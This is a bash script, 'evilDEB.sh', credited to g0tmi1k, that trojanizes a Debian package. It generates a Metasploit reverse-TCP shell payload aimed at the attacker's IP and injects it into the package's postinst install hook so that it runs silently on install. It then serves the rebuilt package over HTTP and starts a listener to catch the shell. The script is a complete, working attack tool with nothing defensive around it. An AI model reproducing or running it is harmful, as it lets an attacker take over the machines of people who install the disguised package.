#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilDEB.sh (v0.1 2010-07-30)

# Network interface (check with ifconfig) e.g. eth0
interface=eth0

# Settings *** Dont touch ***
export     ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
export      port=$(shuf -i 2000-65000 -n 1)
export   version="0.1"

if [ "$(id -u)" != "0" ]; then echo -e "\e[00;31m[-]\e[00m Not a superuser." 1>&2; cleanup; fi

trap 'cleanup' 2 # Interrupt - "Ctrl + C"
function cleanup() {
   echo
   echo -e "\e[01;32m[>]\e[00m Cleaning up..."
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
   if [ "$debug" == "false" ]; then xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf evilDEB/"; fi
   echo -e "\e[01;36m[>]\e[00m Done! (= Have you... g0tmi1k?"
   exit 0
}

function help() {
   echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com

 Usage: bash evilDEB.sh -i [interface] -d [file]

 Common options:
   -i  ---  Network interface (check with ifconfig) e.g. eth0
   -d  ---  DEB file to use
"
   exit 1
}

echo -e "\e[01;36m[*]\e[00m g0tmilk's evilDEB v$version"
debFile=""

while getopts "d:i:m:dh?" OPTIONS; do
  case ${OPTIONS} in
    d     ) export debFile=$OPTARG;;
    i     ) export interface=$OPTARG;;
    ?|h   ) help;;
    *     ) echo "\e[00;31m[-]\e[00m Unknown option.";;   # DEFAULT
  esac
done

echo -e "\e[01;32m[>]\e[00m Checking environment..."
if [ -z "$(pgrep python)" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
fi

if [ -e "/tmp/evilDEB" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/"
fi

mkdir -p /tmp/evilDEB/
cd /tmp/evilDEB/

if [ "$debFile" == "" ]; then
   echo -e "\e[01;32m[>]\e[00m Downloading .DEB..."
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Downloading DEB..." -e "apt-get -d install xbomb"
   mv /var/cache/apt/archives/xbomb_2.1a-7_i386.deb ./
   debFile="xbomb_2.1a-7_i386.deb"
else
  cp $debFile ./
  ls
fi

echo -e "\e[01;32m[>]\e[00m Extracting .DEB..."
mkdir -p extracted/{DEBIAN,tmp}
dpkg -x $debFile extracted/
ar p $debFile control.tar.gz | tar zx
cp control extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating payload..."
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating exploit" -e "/opt/metasploit3/bin/msfpayload linux/x86/shell_reverse_tcp LHOST=$ourIP LPORT=$port X > /tmp/evilDEB/extracted/tmp/g0tmi1k"

echo -e "\e[01;32m[>]\e[00m Injecting payload..."
if [ -e "postinst" ]; then
   echo -e "\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" >> postinst
else
   echo -e "#! /bin/sh\n\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" > postinst
fi
mv postinst extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating .DEB file..."
chmod 755 extracted/DEBIAN/postinst
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating DEB..." -e "dpkg-deb --build /tmp/evilDEB/extracted"
mv extracted.deb evilDEB-${debFile##*/}

echo -e "\e[01;32m[>]\e[00m Running web server... (http://$ourIP:8000)"
#xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "/etc/init.d/apache2 start"
if [ "$debug" == "false" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/extracted"
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -f /tmp/evilDEB/{changelog,control,postint}"
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "python -m SimpleHTTPServer"&
else
   python -m SimpleHTTPServer &
fi

echo -e "\e[01;32m[>]\e[00m Running metasploit..."
/opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=$ourIP LPORT=$port E

cleanup